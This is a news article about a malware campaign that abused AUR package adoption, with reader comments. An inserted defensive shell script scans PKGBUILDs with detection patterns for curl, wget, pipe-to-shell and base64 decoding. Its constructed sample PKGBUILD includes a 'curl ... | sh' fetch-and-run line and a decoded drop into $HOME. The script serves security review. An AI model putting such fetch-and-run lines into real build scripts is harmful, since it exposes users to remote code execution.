Arch Linux Blocks New AUR Registrations Amid Malware Cleanup

Arch Linux’s AUR is still operational, while new account registration appears blocked during ongoing cleanup work.

Arch Linux is dealing with one of the largest security incidents to hit the Arch User Repository in recent memory, as maintainers continue cleaning up a wave of malicious package updates across the community-maintained platform.

Importantly, the AUR remains online, and packages are accessible. However, new account registration is unavailable, with the registration page returning a 503 Service Unavailable error. While not officially announced, this suggests Arch has temporarily blocked an entry point as it works through the cleanup.

The move follows an official Arch Linux warning notice dated June 12 about a “high volume” of malicious package adoptions and updates in the AUR. Maintainers are tracking down malicious commits and trying to prevent more from being pushed while preparing a permanent solution.

Arch also warned users may experience problems with new account creation, package updates, adoptions, and new package creation during the response.

Unfortunately, the incident appears far larger than early reports suggested. Initial public reports pointed to over 400 affected AUR packages, while later community tracking raised the number to more than 1,500. The final count may still change as maintainers continue auditing and removing malicious changes.

The scale of the AUR helps explain why the incident is difficult to contain quickly. According to the repository’s own statistics, the AUR currently lists 107,405 packages, including 13,051 orphan packages. It also shows 273 packages added in the past seven days and 5,575 packages updated over the same period, alongside 141,968 registered users.

The campaign reportedly abused the AUR’s package adoption system, where orphaned packages can be taken over by new maintainers. Malicious updates were pushed to affected packages, sometimes pulling external payloads during build or installation.

For users, the immediate advice remains: review PKGBUILD files and install scripts before installing or updating AUR packages, especially if a package recently changed maintainer or received an unexpected update. Users who installed recently updated packages should check the package history and inspect commands executed during build or install.
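As an added example of the pre-install review described above (this is not the article's or the Arch project's code), the following POSIX shell helper scans a PKGBUILD for lines that deserve a human look before `makepkg` runs: downloads performed inside `build()` or `package()` rather than declared in `source=()` where makepkg checksums them, pipes into a shell, base64 decoding, `eval`, and writes into the user's home directory. The function names (`aur_scan`, `aur_scan_count`, `sample_*_pkgbuild`) and the two sample PKGBUILDs are constructed for this example; `example.invalid` is a placeholder host, not a real package source.

```shell
#!/bin/sh
# Added example (not Arch tooling): a pre-build review helper for AUR PKGBUILDs.
# It does not decide for you; it surfaces lines to read before running makepkg.

# Extended regexes joined with |. Each one names something a reviewer should
# explain to themselves before building the package.
RISKY_PATTERNS='curl[[:space:]]|wget[[:space:]]|\|[[:space:]]*(ba)?sh([[:space:]]|$)|base64[[:space:]]+(-d|--decode)|[[:space:]]eval[[:space:]]|\$HOME|~/\.'

# aur_scan FILE: print flagged lines as "<lineno>:<text>" (comment lines are
# skipped). Returns 0 when nothing is flagged, 1 when something is, 2 on error.
aur_scan() {
    file=$1
    [ -r "$file" ] || { echo "cannot read $file" >&2; return 2; }
    hits=$(grep -nE "$RISKY_PATTERNS" "$file" | grep -vE '^[0-9]+:[[:space:]]*#' || true)
    if [ -n "$hits" ]; then
        printf '%s\n' "$hits"
        return 1
    fi
    return 0
}

# aur_scan_count FILE: number of flagged lines (0 when clean), for scripting.
aur_scan_count() {
    n=$(aur_scan "$1" | grep -c . || true)
    echo "$n"
}

# Constructed sample: sources declared up front, nothing fetched at build time.
# Writes a PKGBUILD to a temp file and prints its path.
sample_clean_pkgbuild() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
pkgname=example-tool
pkgver=1.2.0
pkgrel=1
arch=('x86_64')
source=("https://example.invalid/example-tool-$pkgver.tar.gz")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000')
build() {
    cd "$srcdir/$pkgname-$pkgver"
    make
}
package() {
    cd "$srcdir/$pkgname-$pkgver"
    make DESTDIR="$pkgdir" install
}
EOF
    echo "$f"
}

# Constructed sample: the kind of update a reviewer should stop on. It fetches
# and runs remote code during build() and drops a decoded file into $HOME.
sample_suspicious_pkgbuild() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
pkgname=example-tool
pkgver=1.2.1
pkgrel=2
arch=('x86_64')
source=("https://example.invalid/example-tool-$pkgver.tar.gz")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000')
build() {
    cd "$srcdir/$pkgname-$pkgver"
    # constructed: code fetched at build time, bypassing source=() checksums
    curl -s https://example.invalid/setup.sh | sh
    make
}
package() {
    cd "$srcdir/$pkgname-$pkgver"
    make DESTDIR="$pkgdir" install
    echo 'ZWNobyBoaQ==' | base64 -d > "$HOME/.local/bin/helper"
}
EOF
    echo "$f"
}

# Usage: aur_scan /path/to/PKGBUILD   (exit status 1 means "read these lines")
```

In practice the scan sits after the history check the article recommends: AUR packages are git repositories at `https://aur.archlinux.org/<pkgname>.git`, so `git log --format='%h %an %ad %s' -- PKGBUILD` shows who changed the build recipe and when, and `git diff <previous-commit>..HEAD -- PKGBUILD '*.install'` shows exactly what a new maintainer's first commit altered. Run `aur_scan` over the PKGBUILD and any `.install` file, and treat a `SKIP` checksum for a non-VCS source, or a maintainer change followed by an unexplained `pkgrel` bump, as reasons to read the diff in full rather than as things the regexes will catch for you.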

Predictably, this incident will likely renew discussion around AUR safeguards. Possible areas include tougher rules for adopting orphan packages, delays before new accounts can submit or adopt packages, and stronger review of sudden ownership changes.

For now, Arch Linux is keeping the AUR operational while blocking or limiting actions that could let the campaign continue. New registrations being unavailable is the clearest sign the project is taking containment measures while maintainers clean up malicious packages.

Bobby Borisov

Bobby, an editor-in-chief at Linuxiac, is a Linux professional with over 20 years of experience. With a strong focus on Linux and open-source software, he has worked as a Senior Linux System Administrator, Software Developer, and DevOps Engineer for small and large multinational companies.

11 Comments

  1. Alex

    Normally only unneeded rare packages contain malware. Just don't use them.

  2. Alex

    There is also https://appimage.github.io/apps/ if you wish. Flatpak. But then use other distribution.

  3. Alex

    Even presidents get donations from doubtful sources. In a democracy, someone can vote for bad people.

    1. Alex

      But the advantages prevail.

  4. Josef

    I like using the AUR repository. These attacks don’t bother me. Anyone who installs packages from the AUR should verify what they’re actually installing and how secure it is.

  5. yoyo

    Well I loved a lot arch based distros.
    I said goodbye.
    Tired of attacks on AUR.
    Now I use Void, Mx Linux & Fedora.

    I bet all these attacks are aimed to ‘lower’ linux distros reputation/security.

    This is not coincidence.

    Many are leaving Windows…

    Even Windows created its Linux distro, ROFL…

    ;=

    1. VoltaFlake

      Reactionary much?
      Void and MX are good alternatives either way.
      I also suspect these attacks are astroturfing, but by Red Hat (the Microsoft of Linux) to push their own solution. Wouldn’t be the first time they do some crappy stuff to discredit the competition and push their own agenda.

  6. Waten

    I would never use this for software

    1. AlexLitter

      Why is that?
      The AUR is a fantastic resource if you use it with all the caution required.
      I have several packages installed, and no issues (even with these attacks).

      1. Rick

        What's the point of using it when you can find almost anything from safer vetted sources.

        1. Alex

          Those sources don't like competition, I guess.
